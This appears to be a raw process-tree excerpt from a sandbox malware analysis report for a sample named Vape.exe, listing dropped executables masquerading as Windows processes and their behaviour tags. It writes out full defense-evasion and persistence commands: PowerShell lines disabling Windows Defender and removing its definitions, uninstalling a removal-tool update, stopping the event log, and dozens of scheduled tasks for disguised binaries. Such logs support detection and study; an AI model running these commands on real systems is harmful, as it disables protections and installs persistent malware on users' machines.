C:\Program Files\VideoLAN\VLC\plugins\explorer.exe
"C:\Program Files\VideoLAN\VLC\plugins\explorer.exe"
2⤵
- Executes dropped EXE
PID:7236

C:\Webdriversession\OfficeClickToRun.exe
C:\Webdriversession\OfficeClickToRun.exe
2⤵
- Executes dropped EXE
PID:7888

C:\Webdriversession\wininit.exe
C:\Webdriversession\wininit.exe
2⤵
- Executes dropped EXE
PID:7980

C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe
"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"
2⤵
- Executes dropped EXE
PID:7900

C:\Program Files\Windows NT\TableTextService\unsecapp.exe
"C:\Program Files\Windows NT\TableTextService\unsecapp.exe"
2⤵
- Executes dropped EXE
PID:8148

C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe
"C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"
2⤵
- Executes dropped EXE
PID:8196

C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
2⤵
- Executes dropped EXE
PID:8852

C:\Webdriversession\cmd.exe
C:\Webdriversession\cmd.exe
2⤵
- Executes dropped EXE
PID:8940

C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe"
2⤵
- Executes dropped EXE
- Launches sc.exe
PID:8964

C:\Users\Default User\dllhost.exe
"C:\Users\Default User\dllhost.exe"
2⤵
- Executes dropped EXE
PID:9756

C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe
"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"
2⤵
- Executes dropped EXE
PID:9844

C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
2⤵
- Executes dropped EXE
PID:10272

C:\Webdriversession\cmd.exe
C:\Webdriversession\cmd.exe
2⤵
- Executes dropped EXE
PID:10356

C:\Program Files\VideoLAN\VLC\plugins\explorer.exe
"C:\Program Files\VideoLAN\VLC\plugins\explorer.exe"
2⤵
- Executes dropped EXE
PID:10468

C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe
"C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"
2⤵
- Executes dropped EXE
PID:11108

C:\Webdriversession\OfficeClickToRun.exe
C:\Webdriversession\OfficeClickToRun.exe
2⤵
- Executes dropped EXE
PID:11052

C:\Webdriversession\wininit.exe
C:\Webdriversession\wininit.exe
2⤵
- Executes dropped EXE
PID:11136

C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe
"C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe"
2⤵
- Executes dropped EXE
- Launches sc.exe
PID:11736

C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe
"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"
2⤵
- Executes dropped EXE
PID:11820

C:\Program Files\Windows NT\TableTextService\unsecapp.exe
"C:\Program Files\Windows NT\TableTextService\unsecapp.exe"
2⤵
- Executes dropped EXE
PID:11892

C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
2⤵
- Executes dropped EXE
PID:11884

C:\Webdriversession\cmd.exe
C:\Webdriversession\cmd.exe
2⤵
- Executes dropped EXE
PID:11740

C:\Users\Default User\dllhost.exe
"C:\Users\Default User\dllhost.exe"
2⤵
- Executes dropped EXE
PID:12848

C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe
"C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe"
2⤵
- Executes dropped EXE
PID:12792

C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
2⤵
- Executes dropped EXE
PID:13936

C:\Webdriversession\cmd.exe
C:\Webdriversession\cmd.exe
2⤵
- Executes dropped EXE
PID:13984

C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe
"C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe"
2⤵
- Executes dropped EXE
PID:14080

C:\Program Files\VideoLAN\VLC\plugins\explorer.exe
"C:\Program Files\VideoLAN\VLC\plugins\explorer.exe"
2⤵
- Executes dropped EXE
PID:14152

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1156

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1248

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1264

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1284

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1452

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1460

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2896

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1540

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1604

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1800

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1868

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:2000

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1612

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2264

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2276

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2296

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2380

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2456

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2464

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2484

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2516

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2912

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:2748

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2660

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3296

C:\Users\Admin\AppData\Local\Temp\Vape.exe
"C:\Users\Admin\AppData\Local\Temp\Vape.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:824

C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_Protection.exe"
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:660

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Webdriversession\gI2DkJwTD.vbe"
4⤵
PID:640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Webdriversession\SoPkc.bat" "
5⤵
PID:784

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:3144

C:\Webdriversession\Intoref.exe
"C:\Webdriversession\Intoref.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wo1j4pKD13.bat"
7⤵
PID:2168

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
8⤵
PID:4000

C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
"C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:4756

C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_crypt.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4680

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
4⤵
- Suspicious use of WriteProcessMemory
PID:1960

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:604

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
4⤵
PID:3672

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1592

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
4⤵
PID:2588

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3808

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
4⤵
PID:428

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
4⤵
PID:1500

C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2932

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "QHRAJGDI"
4⤵
- Launches sc.exe
PID:4320

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2144

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "QHRAJGDI" binpath= "C:\ProgramData\nalfdgwigwyg\lhhsgwktkatl.exe" start= "auto"
4⤵
- Launches sc.exe
PID:2704

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
4⤵
- Launches sc.exe
PID:4284

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "QHRAJGDI"
4⤵
- Launches sc.exe
PID:1316

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:200

C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5088

C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'"
5⤵
- Suspicious use of WriteProcessMemory
PID:392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_R.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
5⤵
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
6⤵
PID:1492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
6⤵
- Deletes Windows Defender Definitions
PID:4296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
- Suspicious use of WriteProcessMemory
PID:3192

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
- Suspicious use of WriteProcessMemory
PID:3576

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4620

C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4752

C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'"
5⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
5⤵
- Suspicious use of WriteProcessMemory
PID:1444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
6⤵
- Deletes Windows Defender Definitions
PID:492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
5⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
5⤵
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324

C:\Users\Admin\AppData\Local\Temp\Msvchost.exe
"C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"
3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3456

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft_WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe"
4⤵
- Creates scheduled task(s)
PID:2284

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /delete /f /tn "Microsoft_WindowsDefender"
4⤵
PID:6516

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCF78.tmp.bat""
4⤵
PID:6548

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:6564

C:\Windows\system32\timeout.exe
timeout 3
5⤵
- Delays execution with timeout.exe
PID:6612

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3832

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:4964

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4316

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2996

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:3972

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3580

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:3908

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:3480

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:3916

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Program Files\Microsoft Office\PackageManifests\WmiPrvSE.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "scs" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sc" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "scs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\sc.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:68

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Defender\uk-UA\csrss.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Webdriversession\OfficeClickToRun.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Webdriversession\OfficeClickToRun.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4272

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Webdriversession\OfficeClickToRun.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4384

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Photo Viewer\es-ES\WmiPrvSE.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2144

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\uk-UA\ApplicationFrameHost.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\csrss.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\csrss.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\csrss.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\plugins\explorer.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\plugins\explorer.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files\VideoLAN\VLC\plugins\explorer.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4320

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\TableTextService\unsecapp.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\unsecapp.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\TableTextService\unsecapp.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Webdriversession\wininit.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Webdriversession\wininit.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Webdriversession\wininit.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f
2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1688

